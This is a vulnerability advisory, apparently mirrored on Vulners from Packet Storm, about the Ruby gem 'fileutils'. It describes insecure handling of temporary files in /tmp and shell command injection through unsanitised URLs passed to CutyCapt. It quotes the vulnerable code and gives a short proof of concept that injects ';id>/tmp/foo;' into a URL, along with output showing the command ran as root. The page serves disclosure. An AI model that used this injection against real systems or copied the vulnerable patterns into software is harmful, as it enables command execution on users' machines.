Vulners
Lucene search
Fileutils Ruby Gem Remote Command Execution
🗓️ 28 Feb 2013 00:00:00Reported by Larry W. CashdollarType 
packetstorm🔗 packetstormsecurity.com👁 24 Views
`Possible remote command execution and insecure file handling in /tmp.
2/23/2013
http://rubygems.org/gems/fileutils
"A set of utility classes to extract meta data from different file types".
Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and files are maniplated there. This directory can be hijacked and the contents manipulated by a malicious user.
in ./lib/file_utils.rb
15 def zip (target, *sources)
16 targetdir = "{FileUtils::Config.tmp_dir}/zip"
17 id = 1
18 while File.exists?(targetdir)
19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20 id += 1
21 end
22 FileUtils.mkdir(targetdir)
where Config.tmp_dir = /tmp
in ./lib/file_utils/config.rb
5 def self.tmp_dir
6 @tmp_dir ||= '/tmp'
7 end
Remote command execution:
From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:
need to test URL encoding not sure if this is valid.
http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz
7 def capture (url, target)
8 command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}")
9 `#{command}`
10 end
partial PoC if client is tricked into using malicious URL:
irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo -rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#
Michael Scherer of Redhat.com found other issues during a discussion about the above issues I found:
In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`
I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky chars result in funky results.
There is another issue in
# Generates a temp filepath for the given extension def temp (extension)
path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)
path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
id += 1
end
Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.
Thanks to vl4dz and Michael.
Larry W. Cashdollar @_larry0
http://vapid.dhs.org
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2013 00:00Current
7.4High risk
Vulners AI Score7.4